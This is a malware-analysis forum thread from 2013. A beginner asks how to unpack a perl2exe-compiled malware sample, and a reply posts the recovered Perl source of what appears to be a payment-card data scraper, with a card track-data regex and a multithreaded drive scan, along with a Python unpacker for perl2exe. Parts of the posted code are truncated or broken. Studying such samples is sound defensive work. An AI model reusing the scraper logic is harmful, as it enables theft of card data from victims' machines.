A forum for reverse engineering, OS internals and malware analysis 

Ask your beginner questions here.
 #18390  by Cyb3rHack3r
 Fri Mar 01, 2013 6:07 pm
Hay, Guys

So i need little help, I am new to malaware reverse engineering but i really love to learn more

Now i am trying to Decompile a malware which is complied using perl2exe

Now like i said i am new i tried my best but no luck because i have never Decompiled a perl2exe file before

So i am not fully sure how i should do it, I tried to search on the net and found some really

Interesting information like its decrypted during runtime

So can any one tell me how i can decompile the file and get the decrypted source code

By the way i tried this tool called exe2perl which is suppose to be decompiler but i got a error saying

"signature not found, exiting" so any help is appreciated.
 #18392  by Cyb3rHack3r
 Fri Mar 01, 2013 7:32 pm
I actully tried to follow that tut before as well but

i got stuck at
Code: Select all
Load this up in IDA.

There is a routine in the p2x.dll which will loop over the decrypted TOC, the TOC contains a list of filenames, sizes and a flag indicating whether it is encrypted or not.

As its enumerating the list (at startup) it will compare the filename to a list of file extensions
As i am new to all this i wasn't able to follow the whole tutorial, And i am trying bunch of diff software hoping one will do what you say, If you know any software which does that please do let me know.
 #18393  by r2nwcnydc
 Fri Mar 01, 2013 8:05 pm
http://www.kernelmode.info/forum/viewto ... ?f=16&t=64

The sandboxes on that link will at a minimum show the files that changed. Some of them should give you the files as well; I use a commerical version so we get the files I don't know if the free versions offer the same service.

http://www.kernelmode.info/forum/viewto ... =11&t=1735

If those don't work and you can figure out the temporary directory, you could also try changing the folders permissions so that no one has the right to delete files from that folder. I doubt perl2exe overwrites the files first.
 #18394  by Cyb3rHack3r
 Fri Mar 01, 2013 8:43 pm
Thanks for the reply, however i did mange to get the files which are created using a disassembler

But the files are saved in a temp folder which are jest bunch of dlls used by perl2exe so i think it is decrypting the

data in the memory or something, I did dump the memory i do see small parts of the source but fixing it will be really hard

or maybe i am dumping the memory wrong, Any suggestions.
 #18395  by r2nwcnydc
 Fri Mar 01, 2013 9:01 pm
I'm not sure then.. If you post the file I can play around with it and give you a better answer. But otherwise, I'm just googling and spinning my wheels.
 #18398  by reverser
 Sat Mar 02, 2013 10:56 am
Main script.
Code: Select all
#!/usr/bin/perl# Подключаем основные модули
# 24.03.2008
#	- При обнаружении в файле данных соотвествующих строке поиска (regex)
#	  прекращать обработку файла.
#perl2exe_include "Tie/Handle.pm";
#perl2exe_include "Math/BigInt/Calc.pm";
use Win32::Console::ANSI;
use strict;
use warnings;
#use DBI;
use FileHandle;
use Win32API::File::Time qw{:win};
use threads;
use POSIX qw{floor};
require "general.pm";
require "netenum.pm";
no warnings 'threads';

use vars '$dbh', '$url_start', '$dir_start', '@dir_filter', '@file_type_exclude','$version','$regex','$maxlivetime','$debug','@file_name_include','$dietime','$lansttype';
$lansttype = 'Gen';
$version="Version 1.4a MultiThread from 22.04.2008";
#$regex = '((([0-9]{13,19}=)|([a-zA-Z\s]{3}\^))(0[7-9]|1[0-5])((0[1-9])|(1[0-2]))|(CARD_NUMBER|EXPIRATION_DATE|CVV|TRACK2|TRACK1){1})';
$regex = '((([0-9]{13,19}=)|([a-zA-Z\s]{3}\^))(0[7-9]|1[0-5])((0[1-9])|(1[0-2])))';
$maxlivetime = 86400*30*6*2; # последнее обновление файла, примерно пол года
$debug = 'off';
$dietime = 1207392905+(86400*30*2);
if ( time  > $dietime ) { die("Can't open Handle/Tie.PM!"); };
# Фильтр директорий (директории, которые исключаются из индексации)
    @dir_filter = (
# Фильтр файлов (какие расширения файлов индексировать)
    @file_type_exclude = (
                   'exe','ex_',				# Executables
                   'dll','dl_',				# Libraries
                   'cab','msi',				# Cabinet/Installs
                   'chm','hlp',				# Help files
                   'mid','midi',                        # Sound files (MID)
                   'rar','zip','tgz','gz',              # Archives 
                   'mp3','wma','wav',			# Sound files (MPEG)
                   'avi','mov','wmv','mpeg',		# Video files
		   'png','jpg','tiff','bmp','gif',	# Pictures
                   'iso',				# ISO Images
                   'swf',				# Flash files
                   'htm','html',			# HTML Pages
                   'asp','aspx',			# ASP Sciprts
                   'vbs','pl','php','cgi',		# Perl, PHP, etc Scritps
		   'c','h',				# C files
		   'psd',				# Presentations
                   'pdf',				# Acrobar Reader files
		   'grd'				# Strong Disk files
# Всегда пишем в лог эти файлы:
    @file_name_include = (
# Сразу отправляем заголовок браузеру
#    print "Content-type: text/html; charset=windows-1251\n\n";

my $time = time();

if ( !defined($ARGV[0]) || ((defined($ARGV[0])) && ( $ARGV[0] ne '*')) ) {
  if (( @ARGV == 1 ) && ( $ARGV[0] eq "checkme" )) { print "LANST WORKING FINE"; exit; };
  if ( @ARGV == 1 ) { 
    print "Start dir: $dir_start\n";
  } else {
    my @thr;
    my $x=0; 
    print O "1";
    print "Creating threads for";
#    for (my $i='C'; $i ne 'AA'; $i++) {
    for (my $i='C'; $i ne 'AA'; $i++) {
      my $param = $i.':/';
      next if !(-d $param);
      print " disk $i ";
      $thr[$x] = threads->create('recursion',"$param");
    print "Loaded ($x).\nWorking";
    my $exit=0;
    while (threads->list(threads::running)) {
      my $total = threads->list(threads::running);
      my $done = floor(($x-$total)/$x*100);
      print ".$total($done"."%".")";
  print O "1";
  print "\n";
} else {
  print "Network enumeration...\n";
  print O "1";
  print O "1";
print "Done!\n";
$time = time() - $time;
print "Elapsed: $time seconds\n";
 #18399  by reverser
 Sat Mar 02, 2013 11:13 am
Python script for unpacking.
Code: Select all
# p2x unpacker (c) 2012 reverser

import array
import sys
import os.path
import os

def make_key(src):
  dst = array.array('B')
  for i in range(256):
  srclen = len(src)
  src = array.array('B', src)
  j = 0
  k = 0
  for i in range(256):
    j = (src[k] + j + dst[i]) & 0xFF
    dst[j], dst[i] = dst[i], dst[j]
    k = (k + 1) % srclen
  return dst

def unscramble_1(src, k):
  srclen = len(src)
  src = array.array('B', src)
  p1 = k[256]
  p2 = k[257]
  for i in range(srclen):
    p1 = (p1 + 1) & 0xFF
    p2 = (p2 + k[p1]) & 0xFF
    k[p2], k[p1] = k[p1], k[p2]
    src[i] ^= k[(k[p1] + k[p2]) & 0xFF]
  k[256] = p1
  k[257] = p2
  return src.tostring()

class Decryptor:
  def __init__(self, tpl, s):
    k1 = make_key(s)
    sc = unscramble_1(tpl, k1)
    self.key = make_key(sc)

  def decrypt(self, s):
    k1 = self.key[:]
    return unscramble_1(s, k1)

g_dec = Decryptor("For more information visit www.indigostar.com", "continue")

# NAME=<name>;SIZE=<size>;ENC=<enc>
def parse_finfo(s):
  props = {}
  i1 = s.find('NAME=')
  i2 = s.find(';SIZE=', i1+5)
  if i1 == -1 or i2 == -1:
  props['name'] = s[i1+5:i2]
  i3 = s.find(';ENC=', i2+6)
  if i3 != -1:
    props['size'] = int(s[i2+6:i3])
    props['enc'] = int(s[i3+5:])
    i3 = s.find(';VALUE=', i2+6)
    if i3 == -1:
      props['size'] = int(s[i2+6:])
      props['value'] = ''
      props['size'] = int(s[i2+6:i3])
      props['value'] = s[i3+7:]
    props['enc'] = 0
  return props

def write_file(name, body):
  dir = os.path.dirname(name)
  if dir and not os.path.exists(dir):
  open(name, 'wb').write(body)

if len(sys.argv) < 2:
  print "Usage: p2x_dec.py <file.exe>"

taillen = 256
fn = sys.argv[1]
inf = open(fn, "rb")
inf.seek(-taillen, 2)
stail = g_dec.decrypt(inf.read(taillen))
tocprops = parse_finfo(stail)
if not tocprops:
  print "Not a perl2exe file?"

tocsz = tocprops['size']
inf.seek(-taillen - tocsz, 2)
toc = inf.read(tocsz)
toc = g_dec.decrypt(toc)
write_file(tocprops['name'], toc)
for line in toc.split('\n'):
  line = line.rstrip('\n')
  fprops = parse_finfo(line)
  if fprops:
    sz = fprops['size']
    nm = fprops['name']
    if sz:
      fbody = inf.read(sz)
      if fprops['enc']:
        fbody = g_dec.decrypt(fbody)
      print nm
      write_file(nm, fbody)
 #18639  by jpac
 Thu Mar 21, 2013 10:14 pm
I need some help reversing a perl2exe file as well -reverser, can you assist with this? thank you!